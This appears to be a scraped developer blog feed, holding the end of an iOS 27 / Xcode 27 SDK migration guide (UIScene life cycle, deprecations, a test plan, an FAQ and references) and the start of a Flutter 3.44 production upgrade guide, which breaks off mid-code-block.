&lt;p&gt;The last row is where teams get this wrong. The app delegate does not go away. The process still launches once and &lt;code&gt;UIApplicationDelegate&lt;/code&gt; still handles it. What moves is anything that owns or touches the window, because life-cycle events now happen per scene rather than globally. If your &lt;code&gt;didFinishLaunchingWithOptions&lt;/code&gt; creates a &lt;code&gt;UIWindow&lt;/code&gt;, that code is the migration.&lt;/p&gt;

&lt;p&gt;After migrating, test in Full Screen Apps, Windowed Apps, and Stage Manager on iPad. Scenes can background independently, so state-saving code that assumed one global background event now runs per scene.&lt;/p&gt;

&lt;h2&gt;
  
  
  The deprecations that are real, and the ones being overstated
&lt;/h2&gt;

&lt;p&gt;Apple's iOS and iPadOS 27 beta 3 release notes are the source of record here. Several round-ups have inflated what they say, so this table tracks Apple's own wording.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Change in the iOS 27 SDK&lt;/th&gt;
&lt;th&gt;Apple's wording&lt;/th&gt;
&lt;th&gt;What to do&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;On Demand Resources and &lt;code&gt;NSBundleResourceRequest&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;"are deprecated. Use Background Assets instead."&lt;/td&gt;
&lt;td&gt;Plan the move to Background Assets. This is a real deprecation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Original MetricKit APIs (&lt;code&gt;MXMetricManager&lt;/code&gt;, &lt;code&gt;MXMetricManagerSubscriber&lt;/code&gt;, &lt;code&gt;MXMetricPayload&lt;/code&gt;, &lt;code&gt;MXDiagnosticPayload&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;"no longer recommended for new adoption. Use MetricManager instead."&lt;/td&gt;
&lt;td&gt;Not deprecated. Do not rewrite working telemetry this quarter. Use &lt;code&gt;MetricManager&lt;/code&gt; for new code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Neural Engine background access&lt;/td&gt;
&lt;td&gt;The system "now restricts background access to the Neural Engine, similar to GPU usage restrictions"&lt;/td&gt;
&lt;td&gt;Test any background on-device inference. This can change behaviour silently&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;calendar.deleteEvents&lt;/code&gt; App Intents schema&lt;/td&gt;
&lt;td&gt;"has been renamed to &lt;code&gt;calendar.deleteEvent&lt;/code&gt;."&lt;/td&gt;
&lt;td&gt;Rename it. A one-line fix that fails at runtime if missed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PencilKit &lt;code&gt;__PKStrokeRenderState&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renamed to &lt;code&gt;PKStrokeRenderStateReference&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Only affects apps touching stroke render state directly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AirPort Utility&lt;/td&gt;
&lt;td&gt;No longer available for new downloads; "functionality is not guaranteed" on iOS 27&lt;/td&gt;
&lt;td&gt;Irrelevant to most teams, listed because round-ups misreport it as an API change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The MetricKit row deserves the attention. Multiple write-ups say &lt;code&gt;MXMetricManager&lt;/code&gt; is "deprecated" and imply you must migrate now. Apple's beta 3 notes say the original MetricKit APIs are "no longer recommended for new adoption" and point to &lt;code&gt;MetricManager&lt;/code&gt;. Those are different statements with different urgency. Use the new API for new instrumentation. Leave working crash and metric pipelines alone until Apple actually deprecates them, because rewriting telemetry is how you lose the ability to debug the release you are shipping.&lt;/p&gt;

&lt;p&gt;The Neural Engine restriction is the sleeper. If your app runs on-device inference from a background task, the system now throttles that access the way it throttles background GPU work. Nothing fails to compile. The behaviour just changes. Apps doing background photo classification, on-device transcription, or scheduled model work should test this before September rather than after.&lt;/p&gt;

&lt;h2&gt;
  
  
  Xcode 27: what it forces on your build machines
&lt;/h2&gt;

&lt;p&gt;Xcode 27 beta 3 includes Swift 6.4 and the SDKs for iOS 27, iPadOS 27, tvOS 27, watchOS 27, macOS 27 and visionOS 27. Three constraints matter for a team rather than an individual:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Xcode 27 beta 3 requires a Mac running macOS Tahoe 26.4 or later. Your CI fleet needs that before your developers do.&lt;/li&gt;
&lt;li&gt;On-device debugging supports iOS 17 and later, tvOS 17 and later, watchOS 10 and later, and visionOS. Older test devices in the drawer stop being useful for debugging.&lt;/li&gt;
&lt;li&gt;Build targets with a minimum deployment target of macOS 27.0 or DriverKit 27.0 no longer build Universal by default. &lt;code&gt;ARCHS_STANDARD&lt;/code&gt; drops &lt;code&gt;x86_64&lt;/code&gt; when &lt;code&gt;MACOSX_DEPLOYMENT_TARGET&lt;/code&gt; or &lt;code&gt;DRIVERKIT_DEPLOYMENT_TARGET&lt;/code&gt; is 27.0 or higher. Add &lt;code&gt;x86_64&lt;/code&gt; back to &lt;code&gt;ARCHS&lt;/code&gt; explicitly if you still ship Intel Macs.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There is a known issue worth knowing before it eats a day: Address Sanitizer might fail to launch on iOS 27.0, tvOS 27.0, watchOS 27.0 and visionOS 27.0 when building with Xcode 26.4 or older. Apple's workaround is to use Xcode 26.5 or later when testing with Address Sanitizer.&lt;/p&gt;

&lt;h2&gt;
  
  
  The test pass to run before September
&lt;/h2&gt;

&lt;p&gt;The release candidate is expected in early September, with general release around mid-September 2026. That gives most teams about eight weeks. Run this in order.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Answer the launch question first.&lt;/strong&gt; Run the &lt;code&gt;plutil&lt;/code&gt; command above on every app target you ship, including extensions and any white-label variants. This is a yes or no answer and it determines whether you have a project or a checklist.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Build against the iOS 27 SDK deliberately, in a branch.&lt;/strong&gt; Do not wait for the September scramble. Cut a branch, point CI at Xcode 27, and let it fail now while failing is free.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Audit your cross-platform toolchain, not just your code.&lt;/strong&gt; If you ship Expo, React Native, Flutter, or Unity, your native template is generated. Check whether your framework version emits &lt;code&gt;UIApplicationSceneManifest&lt;/code&gt;, and track the upstream issue if it does not. This is the dependency most likely to be outside your control and on someone else's timeline.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Test background inference and background tasks on device.&lt;/strong&gt; The Neural Engine restriction and scene-level backgrounding both change behaviour without changing your code. Simulators will not tell you the truth here.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Test the scene seams specifically.&lt;/strong&gt; Multi-window on iPad, Stage Manager, and the app switcher. State restoration bugs from a UIScene migration surface when a second scene appears, which is exactly what your existing test suite never does.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Leave telemetry alone.&lt;/strong&gt; Resist rewriting MetricKit during the same release you are migrating scenes. One structural change per release.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Workstream&lt;/th&gt;
&lt;th&gt;Typical effort&lt;/th&gt;
&lt;th&gt;Risk if deferred past September&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;UIScene migration (UIKit app, single window)&lt;/td&gt;
&lt;td&gt;1 to 3 engineer-days&lt;/td&gt;
&lt;td&gt;Critical. Apps built with the iOS 27 SDK fail to launch&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-platform template fix (Expo, RN, Unity)&lt;/td&gt;
&lt;td&gt;Blocked on upstream, plus 0.5 day to integrate&lt;/td&gt;
&lt;td&gt;Critical, and not on your schedule. Track it now&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;On Demand Resources to Background Assets&lt;/td&gt;
&lt;td&gt;2 to 5 engineer-days&lt;/td&gt;
&lt;td&gt;Medium. Deprecated, not removed, but the migration is real work&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Neural Engine background testing&lt;/td&gt;
&lt;td&gt;0.5 to 1 engineer-day&lt;/td&gt;
&lt;td&gt;Medium. Silent behaviour change, no compile error&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;App Intents schema rename&lt;/td&gt;
&lt;td&gt;Under 1 hour&lt;/td&gt;
&lt;td&gt;Low, but it fails at runtime rather than at build&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MetricKit migration&lt;/td&gt;
&lt;td&gt;Do not start yet&lt;/td&gt;
&lt;td&gt;None. It is a recommendation, not a deprecation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For a single-window UIKit app with a storyboard, the UIScene migration is closer to a day than a week. The apps that hurt are the ones with multiple windows already faked through custom window management, heavy state restoration, or an app delegate that has quietly become the place where everything lives. The real cost is not the SceneDelegate. It is finding every line that assumed one window.&lt;/p&gt;

&lt;h2&gt;
  
  
  India-specific considerations
&lt;/h2&gt;

&lt;p&gt;Two practical notes for teams shipping from or into India.&lt;/p&gt;

&lt;p&gt;Test-device planning is the first. Xcode 27 drops on-device debugging below iOS 17, and Apple Intelligence features are limited to capable devices. If your QA pool leans on older iPhones, the useful test matrix for iOS 27 is narrower than your support matrix, and those are two different lists. Sort out which devices actually need to be in the September rotation before the rush.&lt;/p&gt;

&lt;p&gt;The second is the September calendar. A mid-September iOS release lands directly on the festive commerce season, and a launch-week app update that fails to start is a materially worse outcome for a retail or fintech app in India than in most markets. Freeze early. If your app handles personal data, the same release is a reasonable moment to re-check what your SDKs collect under the &lt;a href="https://www.meity.gov.in/content/digital-personal-data-protection-act-2023" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023&lt;/a&gt;, since a scene migration is already making you read the code that runs at launch. We design applications aligned with DPDP requirements.&lt;/p&gt;

&lt;p&gt;For teams on cross-platform stacks, our &lt;a href="https://ecorpit.com/flutter-3-44-production-upgrade-guide-2026/" rel="noopener noreferrer"&gt;Flutter 3.44 production upgrade guide&lt;/a&gt; covers the parallel work on that side, and the &lt;a href="https://ecorpit.com/xcode-27-swift-6-4-developer-features-2026/" rel="noopener noreferrer"&gt;Xcode 27 and Swift 6.4 feature notes&lt;/a&gt; go deeper on the toolchain. The &lt;a href="https://ecorpit.com/ios-27-app-intents-siri-ai-developer-guide-2026/" rel="noopener noreferrer"&gt;iOS 27 App Intents and Siri developer guide&lt;/a&gt; covers the intent surface this release expands.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Will my existing app stop working when users update to iOS 27?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. The scene-based life cycle requirement binds apps built with the latest SDK, not apps running on the new OS. A binary compiled against an earlier SDK keeps launching on iOS 27. The failure appears the moment you rebuild with Xcode 27 and the iOS 27 SDK, which makes this a build-time deadline.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How do I know if my app needs the UIScene migration?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Apple gives two criteria. Migrate if the &lt;code&gt;UIApplicationSceneManifest&lt;/code&gt; key is missing from your information property list or has no configurations, or if your app delegate does not implement &lt;code&gt;application(_:configurationForConnecting:options:)&lt;/code&gt;. Run &lt;code&gt;plutil -extract UIApplicationSceneManifest raw -o - Info.plist&lt;/code&gt; against your target. If it prints missing, you need to migrate.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does the app delegate go away in the scene-based life cycle?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Your app process still launches once and &lt;code&gt;UIApplicationDelegate&lt;/code&gt; still handles it. What moves is anything owning visible UI, because life-cycle events now happen per scene rather than globally. Keep process-level setup in &lt;code&gt;didFinishLaunchingWithOptions&lt;/code&gt;, and move window creation and active or background handling to your scene delegate.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is MXMetricManager deprecated in iOS 27?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not according to Apple. The iOS 27 beta 3 notes say the original MetricKit APIs, including &lt;code&gt;MXMetricManager&lt;/code&gt; and &lt;code&gt;MXMetricManagerSubscriber&lt;/code&gt;, are "no longer recommended for new adoption" and point to &lt;code&gt;MetricManager&lt;/code&gt; instead. Several round-ups report this as a deprecation. Use the new API for new code and leave working pipelines alone.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What happened to On Demand Resources?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;On Demand Resources and the &lt;code&gt;NSBundleResourceRequest&lt;/code&gt; API are deprecated in the iOS 27 SDK, and Apple directs developers to Background Assets instead. Unlike the MetricKit change, this is a real deprecation in Apple's own wording. Plan the migration, but it does not block your September release.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does this affect Expo, React Native, Flutter or Unity apps?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, through the generated native project rather than your own code. An unmodified Expo SDK 56 app built with Xcode 27 beta fails to launch because its template omits &lt;code&gt;UIApplicationSceneManifest&lt;/code&gt;. The issue was accepted on June 8, 2026 and labelled upstream React Native work. Check your framework version and track its fix.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What does Xcode 27 require from our build machines?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Xcode 27 beta 3 requires a Mac running macOS Tahoe 26.4 or later, and it includes Swift 6.4 with the iOS 27 SDK. On-device debugging supports iOS 17 and later only. Plan the CI upgrade before developers need it, because a stale build fleet blocks the whole team at once.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How long does the UIScene migration take?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We budget one to three engineer-days for a typical single-window UIKit app, roughly $400 to $1,200 as of July 2026. Cost rises with custom window management, heavy state restoration, and app delegates that accumulated unrelated logic. The SceneDelegate is quick. Finding every line that assumed one window is not.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT runs iOS SDK migrations as scoped work with a deadline attached: the UIScene audit across every target and extension, the scene migration itself, background and multi-window testing on real devices, and the cross-platform template gaps that sit upstream of your code. Our senior engineering teams have shipped iOS applications since 2021 and plan this work around your release freeze rather than Apple's keynote. If you want your app checked against the iOS 27 SDK before the September release candidate, &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;talk to our team&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://developer.apple.com/documentation/UIKit/transitioning-to-the-uikit-scene-based-life-cycle" rel="noopener noreferrer"&gt;Transitioning to the UIKit scene-based life cycle&lt;/a&gt; - Apple Developer Documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-27-release-notes" rel="noopener noreferrer"&gt;iOS and iPadOS 27 beta 3 release notes&lt;/a&gt; - Apple Developer Documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developer.apple.com/documentation/xcode-release-notes/xcode-27-release-notes" rel="noopener noreferrer"&gt;Xcode 27 beta 3 release notes&lt;/a&gt; - Apple Developer Documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/expo/expo/issues/46664" rel="noopener noreferrer"&gt;Expo prebuild template fails to launch because UIScene lifecycle is required (issue 46664)&lt;/a&gt; - expo/expo&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/learntoflutter/flutter_embed_unity/issues/71" rel="noopener noreferrer"&gt;Explore UIScene lifecycle requirements in iOS 27 (issue 71)&lt;/a&gt; - flutter_embed_unity&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://9to5mac.com/2026/07/02/ios-27-public-beta-release-date-when-you-can-install-the-new-iphone-update/" rel="noopener noreferrer"&gt;iOS 27 public beta release date&lt;/a&gt; - 9to5Mac&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.macrumors.com/2026/07/07/ios-27-public-beta-is-coming-soon/" rel="noopener noreferrer"&gt;iOS 27 public beta is coming soon&lt;/a&gt; - MacRumors&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.forbes.com/sites/davidphelan/2026/07/13/apple-ios-27-release-date-when-you-can-install-iphones-new-software---public-beta-near/" rel="noopener noreferrer"&gt;Apple iOS 27 release date: how to download the first iPhone public beta&lt;/a&gt; - Forbes&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.macworld.com/article/3189014/apple-july-2026-ios-ipados-macos-27-public-betas-tv-arcade-releases.html" rel="noopener noreferrer"&gt;OS 27 betas for all and everything else coming from Apple this month&lt;/a&gt; - Macworld&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://en.wikipedia.org/wiki/IOS_27" rel="noopener noreferrer"&gt;iOS 27&lt;/a&gt; - Wikipedia&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.classmethod.jp/en/articles/ios27-xcode27-migration-preparation-guide/" rel="noopener noreferrer"&gt;Things to prepare for breaking changes in iOS 27 and Xcode 27&lt;/a&gt; - DevelopersIO&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blakecrosley.com/blog/uikit-scene-lifecycle-mandate-ios-27" rel="noopener noreferrer"&gt;UIKit's scene mandate: what fails to launch on iOS 27&lt;/a&gt; - Blake Crosley&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.meity.gov.in/content/digital-personal-data-protection-act-2023" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023&lt;/a&gt; - Ministry of Electronics and Information Technology, Government of India&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.indiacode.nic.in/handle/123456789/22037?locale=en" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023 (No. 22 of 2023), official text&lt;/a&gt; - India Code&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: July 16, 2026.&lt;/p&gt;

</description>
      <category>ios27</category>
    </item>
    <item>
      <title>Flutter 3.44 in production: the upgrade plan for teams shipping real apps</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 18:56:47 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/flutter-344-in-production-the-upgrade-plan-for-teams-shipping-real-apps-49in</link>
      <guid>https://dev.to/mr_manushukla/flutter-344-in-production-the-upgrade-plan-for-teams-shipping-real-apps-49in</guid>
      <description>&lt;h1&gt;
  
  
  Flutter 3.44 in production: the upgrade plan for teams shipping real apps
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; Flutter 3.44 reached stable in May 2026 alongside Dart 3.12, and the current patch is 3.44.6, released on July 8, 2026. Three changes decide how expensive your upgrade is. Swift Package Manager replaced CocoaPods as the default dependency manager for iOS and macOS. Contributions to the Material and Cupertino libraries were frozen on April 7, 2026, one release cycle ahead of their move to standalone packages. Android gained Android Gradle Plugin 9 support with built-in Kotlin, and &lt;code&gt;IconData&lt;/code&gt; is now &lt;code&gt;final&lt;/code&gt;. The CocoaPods registry becomes &lt;a href="https://blog.cocoapods.org/CocoaPods-Specs-Repo/" rel="noopener noreferrer"&gt;read-only on December 2, 2026&lt;/a&gt;, which makes the iOS half of this a deadline rather than a preference. For a mid-size app with 25 to 40 plugins, we budget two to four senior engineer-days, roughly $600 to $1,600 (about ₹50,000 to ₹1,40,000) at July 2026 rates. The upgrade itself is rarely the hard part. The plugins you do not control are.&lt;/p&gt;

&lt;p&gt;Most of the coverage of this release has focused on what is new. That is the wrong question for a team with an app in the stores. The useful question is narrower: what breaks, what has a deadline attached, and what can safely wait until 3.47. This guide answers those three, in the order we run them on client projects.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually changed, and what it costs you
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Change in 3.44&lt;/th&gt;
&lt;th&gt;Who it affects&lt;/th&gt;
&lt;th&gt;Action this quarter&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SwiftPM is the default dependency manager&lt;/td&gt;
&lt;td&gt;Every iOS and macOS app&lt;/td&gt;
&lt;td&gt;Upgrade, let the CLI migrate, audit plugins that lack SwiftPM support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Material and Cupertino contributions frozen (April 7, 2026)&lt;/td&gt;
&lt;td&gt;Every app using &lt;code&gt;material.dart&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Nothing to import yet. Stop forking these libraries and remove deep imports&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AGP 9 support and built-in Kotlin&lt;/td&gt;
&lt;td&gt;Android apps and plugin authors&lt;/td&gt;
&lt;td&gt;Drop the manual Kotlin Gradle plugin block once you move to AGP 9&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;IconData&lt;/code&gt; marked &lt;code&gt;final&lt;/code&gt; and &lt;code&gt;@mustBeConst&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Packages that extend or implement &lt;code&gt;IconData&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Replace subclassing with composition before you upgrade&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid Composition++ (HCPP), opt-in&lt;/td&gt;
&lt;td&gt;Android apps embedding native views&lt;/td&gt;
&lt;td&gt;Test behind the flag on API 34+ devices. Do not ship it by default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;onReorder&lt;/code&gt; deprecated in &lt;code&gt;ReorderableListView&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Apps with reorderable lists&lt;/td&gt;
&lt;td&gt;Move to &lt;code&gt;onReorderItem&lt;/code&gt; and delete the index-adjustment workaround&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;findChildIndexCallback&lt;/code&gt; deprecated&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ListView.separated&lt;/code&gt;, &lt;code&gt;SliverList.separated&lt;/code&gt; users&lt;/td&gt;
&lt;td&gt;Rename to &lt;code&gt;findItemIndexCallback&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two rows on that table have real deadlines. The rest are housekeeping you can schedule.&lt;/p&gt;

&lt;h2&gt;
  
  
  Swift Package Manager is now the default on iOS and macOS
&lt;/h2&gt;

&lt;p&gt;This is the change that will consume your week. As of 3.44, Flutter uses &lt;a href="https://docs.flutter.dev/packages-and-plugins/swift-package-manager/for-app-developers" rel="noopener noreferrer"&gt;Swift Package Manager to manage iOS and macOS native dependencies&lt;/a&gt; by default. CocoaPods continues in maintenance mode, but the registry becomes read-only on December 2, 2026. After that date no new pods or versions land in the trunk. Existing builds keep working. Nothing new arrives.&lt;/p&gt;

&lt;p&gt;The migration is mostly automatic. When you build or run an iOS or macOS app on 3.44, the Flutter CLI updates the Xcode project to add SwiftPM integration. You lose the Podfile, the &lt;code&gt;pod install&lt;/code&gt; step, and the Ruby toolchain that CI has been quietly maintaining for years.&lt;/p&gt;

&lt;p&gt;The failure mode is plugins. Not every plugin has published SwiftPM support, and Flutter falls back to CocoaPods for the ones that have not. That fallback works, so the upgrade will look clean, and you will not discover the gap until the December deadline gets closer. Audit it deliberately instead:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;flutter upgrade
flutter clean
&lt;span class="nb"&gt;cd &lt;/span&gt;ios &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; Pods Podfile.lock &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; ..
flutter build ios &lt;span class="nt"&gt;--config-only&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Read the build output. Flutter warns about dependencies without SwiftPM support and names them. File an issue against each plugin, and record the list somewhere your team will see it again in October.&lt;/p&gt;

&lt;p&gt;If SwiftPM breaks a build you need to ship today, turn it off for the project rather than for yourself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# pubspec.yaml&lt;/span&gt;
&lt;span class="na"&gt;flutter&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enable-swift-package-manager&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That setting applies to everyone working on the project, which is the behaviour you want in a team. The per-user escape hatch is &lt;code&gt;flutter config --no-enable-swift-package-manager&lt;/code&gt;, and it will bite you when CI does not share the setting. The Flutter documentation is blunt about the whole idea: "In general, don't do this. Remember that the CocoaPods registry becomes read-only on December 2, 2026 and disabling SwiftPM won't be allowed in the future."&lt;/p&gt;

&lt;p&gt;If you previously disabled SwiftPM on an earlier version, re-enable it with &lt;code&gt;flutter config --enable-swift-package-manager&lt;/code&gt; before you start, or the migration will silently skip your project.&lt;/p&gt;

&lt;p&gt;One more detail worth knowing before it costs you an afternoon: SwiftPM and CocoaPods can conflict when a plugin ships both. Flutter 3.44 added a guided error message for that case, so read the error rather than deleting &lt;code&gt;Pods/&lt;/code&gt; in a loop.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Material and Cupertino freeze, and what it does not mean yet
&lt;/h2&gt;

&lt;p&gt;On April 7, 2026, the Flutter team froze contributions to the Material and Cupertino libraries in &lt;code&gt;flutter/flutter&lt;/code&gt;. The tracking issue states the scope plainly: contributions "will be frozen as part of decoupling beginning at the next stable release cutoff on April 7th." The libraries are moving out of the SDK into standalone &lt;code&gt;material_ui&lt;/code&gt; and &lt;code&gt;cupertino_ui&lt;/code&gt; packages with independent versioning, closing out a long-standing request in the &lt;a href="https://github.com/flutter/flutter/issues/101479" rel="noopener noreferrer"&gt;decoupling tracking issue&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The reason for freezing early is mechanical. Justin McCandless, a software engineer on the Flutter team at Google, explained the sequencing in the official announcement: "We can achieve this by freezing the code one stable release cycle ahead and copying that frozen code to the new packages." Freeze first, copy the frozen code, then release the packages. That keeps the eventual migration close to a find-and-replace instead of a rewrite.&lt;/p&gt;

&lt;p&gt;Here is the part several write-ups have wrong. As of July 2026, &lt;code&gt;material_ui&lt;/code&gt; on pub.dev is a reserved placeholder described as "coming soon", not a shipping 1.0.0 package. Flutter 3.44 does not deprecate &lt;code&gt;package:flutter/material.dart&lt;/code&gt;, and it does not emit a warning when you import it. Your existing imports are correct, supported, and should stay exactly as they are. If a blog post tells you to swap your imports to &lt;code&gt;package:material_ui/material_ui.dart&lt;/code&gt; today, it is describing a future you cannot install yet.&lt;/p&gt;

&lt;p&gt;What you should do now is cheaper than a migration and pays off either way:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Stop forking Material or Cupertino. A fork you carry across the package split is the one thing that turns a mechanical migration into a project.&lt;/li&gt;
&lt;li&gt;Remove incidental &lt;code&gt;material.dart&lt;/code&gt; imports from files that only need &lt;code&gt;widgets.dart&lt;/code&gt;. Material exports the widgets library, so it is easy to depend on Material by accident. Those accidental imports are what make the split feel expensive later.&lt;/li&gt;
&lt;li&gt;Keep a list of the Material widgets you have subclassed rather than composed. Subclasses are where breaking changes land.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We cover the package split and the migration mechanics in more depth in our guide to the &lt;a href="https://ecorpit.com/flutter-material-ui-cupertino-ui-package-migration-2026/" rel="noopener noreferrer"&gt;Material UI and Cupertino UI package migration&lt;/a&gt;. For this release, the correct action is to do nothing and stop making it worse.&lt;/p&gt;

&lt;h2&gt;
  
  
  Android: AGP 9, built-in Kotlin, and one real breaking change
&lt;/h2&gt;

&lt;p&gt;Flutter 3.44 adds support for Android Gradle Plugin 9 and moves Android projects toward built-in Kotlin configuration. Before AGP 9, app and plugin authors had to add the Kotlin Gradle plugin to their build files manually so the build system could compile Kotlin at all. As of AGP 9.0, the Android build system handles Kotlin natively, and that boilerplate goes away.&lt;/p&gt;

&lt;p&gt;The breaking change that will actually fail your build is quieter. &lt;code&gt;IconData&lt;/code&gt; is now marked &lt;code&gt;final&lt;/code&gt; and &lt;code&gt;@mustBeConst&lt;/code&gt;. Any package that extends or implements &lt;code&gt;IconData&lt;/code&gt; stops compiling. Icon-font packages are the usual offender, because subclassing &lt;code&gt;IconData&lt;/code&gt; was a common way to attach a custom font family. The fix is composition or a constant factory, not a subclass. Check your dependency tree before you upgrade rather than after:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
